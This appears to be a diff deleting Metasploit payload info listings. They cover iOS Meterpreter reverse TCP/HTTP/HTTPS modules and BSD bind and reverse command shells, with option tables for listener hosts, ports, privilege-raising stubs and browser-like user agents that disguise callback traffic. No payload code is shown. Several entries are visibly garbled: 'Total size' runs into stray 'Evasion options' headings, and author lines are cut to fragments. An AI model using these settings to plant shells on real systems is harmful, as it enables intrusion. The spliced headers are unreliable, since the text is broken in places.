ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,58 +0,0 @@
|
||||
|
||||
Name: Apple_iOS Meterpreter, Reverse TCP Inline
|
||||
Module: payload/apple_ios/aarch64/meterpreter_reverse_tcp
|
||||
Platform: Apple_iOS
|
||||
Arch: aarch64
|
||||
Needs Admin: No
|
||||
Total size: 796904
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Adam Cammack <adam_cammack@rapid7.com>
|
||||
Brent Cook <brent_cook@rapid7.com>
|
||||
timwr
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
Description:
|
||||
Run the Meterpreter / Mettle server payload (stageless)
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,38 +0,0 @@
|
||||
|
||||
Name: Apple iOS aarch64 Command Shell, Reverse TCP Inline
|
||||
Module: payload/apple_ios/aarch64/shell_reverse_tcp
|
||||
Platform: Apple_iOS
|
||||
Arch: aarch64
|
||||
Needs Admin: No
|
||||
Total size: 152
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
SHELL /bin/sh yes The shell to execute.
|
||||
|
||||
Description:
|
||||
Connect back to attacker and spawn a command shell
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,63 +0,0 @@
|
||||
|
||||
Name: Apple_iOS Meterpreter, Reverse HTTP Inline
|
||||
Module: payload/apple_ios/armle/meterpreter_reverse_http
|
||||
Platform: Apple_iOS
|
||||
Arch: armle
|
||||
Needs Admin: No
|
||||
Total size
|
||||
Evasion options for payload/apple_ios/armle/meterpreter_reverse_http:
|
||||
=========================
|
||||
|
||||
ok <brent_cook@rapid7.com>
|
||||
timwr
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The local listener hostname
|
||||
LPORT 8080 yes The local listener port
|
||||
LURI no The HTTP Path
|
||||
|
||||
Description:
|
||||
Run the Meterpreter / Mettle server payload (stageless)
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
||||
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,65 +0,0 @@
|
||||
|
||||
Name: Apple_iOS Meterpreter, Reverse HTTPS Inline
|
||||
Module: payload/apple_ios/armle/meterpreter_reverse_https
|
||||
Platform: Apple_iOS
|
||||
Arch: armle
|
||||
Needs Admin: No
|
||||
Total size
|
||||
Evasion options for payload/apple_ios/armle/meterpreter_reverse_https:
|
||||
=========================
|
||||
|
||||
k <brent_cook@rapid7.com>
|
||||
timwr
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The local listener hostname
|
||||
LPORT 8443 yes The local listener port
|
||||
LURI no The HTTP Path
|
||||
|
||||
Description:
|
||||
Run the Meterpreter / Mettle server payload (stageless)
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
||||
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,58 +0,0 @@
|
||||
|
||||
Name: Apple_iOS Meterpreter, Reverse TCP Inline
|
||||
Module: payload/apple_ios/armle/meterpreter_reverse_tcp
|
||||
Platform: Apple_iOS
|
||||
Arch: armle
|
||||
Needs Admin: No
|
||||
Total size: 643824
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Adam Cammack <adam_cammack@rapid7.com>
|
||||
Brent Cook <brent_cook@rapid7.com>
|
||||
timwr
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
Description:
|
||||
Run the Meterpreter / Mettle server payload (stageless)
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,38 +0,0 @@
|
||||
|
||||
Name: BSD Command Shell, Bind TCP Inline
|
||||
Module: payload/bsd/sparc/shell_bind_tcp
|
||||
Platform: BSD
|
||||
Arch: sparc
|
||||
Needs Admin: No
|
||||
Total size: 164
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
vlad902 <vlad902@gmail.com>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LPORT 4444 yes The listen port
|
||||
RHOST no The target address
|
||||
|
||||
Description:
|
||||
Listen for a connection and spawn a command shell
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AppendExit false no Append a stub that executes the exit(0) system call
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,45 +0,0 @@
|
||||
|
||||
Name: BSD Command Shell, Reverse TCP Inline
|
||||
Module: payload/bsd/sparc/shell_reverse_tcp
|
||||
Platform: BSD
|
||||
Arch: sparc
|
||||
Needs Admin: No
|
||||
Total size: 128
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
vlad902 <vlad902@gmail.com>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
Description:
|
||||
Connect back to attacker and spawn a command shell
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AppendExit false no Append a stub that executes the exit(0) system call
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,38 +0,0 @@
|
||||
|
||||
Name: BSD Command Shell, Reverse TCP Inline
|
||||
Module: payload/bsd/vax/shell_reverse_tcp
|
||||
Platform: BSD
|
||||
Arch: vax
|
||||
Needs Admin: No
|
||||
Total size: 100
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
wvu <wvu@metasploit.com>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
Description:
|
||||
Connect back to attacker and spawn a command shell
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,33 +0,0 @@
|
||||
|
||||
Name: BSD x64 Execute Command
|
||||
Module: payload/bsd/x64/exec
|
||||
Platform: BSD
|
||||
Arch: x64
|
||||
Needs Admin: No
|
||||
Total size: 23
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
joev <joev@metasploit.com>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CMD yes The command string to execute
|
||||
|
||||
Description:
|
||||
Execute an arbitrary command
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AppendExit false no Append a stub that executes the exit(0) system call
|
||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,38 +0,0 @@
|
||||
|
||||
Name: BSD x64 Command Shell, Bind TCP Inline (IPv6)
|
||||
Module: payload/bsd/x64/shell_bind_ipv6_tcp
|
||||
Platform: BSD
|
||||
Arch: x64
|
||||
Needs Admin: No
|
||||
Total size: 90
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LPORT 4444 yes The listen port
|
||||
RHOST no The target address
|
||||
|
||||
Description:
|
||||
Listen for a connection and spawn a command shell over IPv6
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AppendExit false no Append a stub that executes the exit(0) system call
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,40 +0,0 @@
|
||||
|
||||
Name: BSD x64 Shell Bind TCP
|
||||
Module: payload/bsd/x64/shell_bind_tcp
|
||||
Platform: BSD
|
||||
Arch: x64
|
||||
Needs Admin: No
|
||||
Total size: 136
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
nemo <nemo@felinemenace.org>
|
||||
joev <joev@metasploit.com>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CMD /bin/sh yes The command string to execute
|
||||
LPORT 4444 yes The listen port
|
||||
RHOST no The target address
|
||||
|
||||
Description:
|
||||
Bind an arbitrary command to an arbitrary port
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AppendExit false no Append a stub that executes the exit(0) system call
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,38 +0,0 @@
|
||||
|
||||
Name: BSD x64 Command Shell, Bind TCP Inline
|
||||
Module: payload/bsd/x64/shell_bind_tcp_small
|
||||
Platform: BSD
|
||||
Arch: x64
|
||||
Needs Admin: No
|
||||
Total size: 88
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LPORT 4444 yes The listen port
|
||||
RHOST no The target address
|
||||
|
||||
Description:
|
||||
Listen for a connection and spawn a command shell
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AppendExit false no Append a stub that executes the exit(0) system call
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,46 +0,0 @@
|
||||
|
||||
Name: BSD x64 Command Shell, Reverse TCP Inline (IPv6)
|
||||
Module: payload/bsd/x64/shell_reverse_ipv6_tcp
|
||||
Platform: BSD
|
||||
Arch: x64
|
||||
Needs Admin: No
|
||||
Total size: 105
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
SCOPEID 0 no IPv6 scope ID, for link-local addresses
|
||||
|
||||
Description:
|
||||
Connect back to attacker and spawn a command shell over IPv6
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AppendExit false no Append a stub that executes the exit(0) system call
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
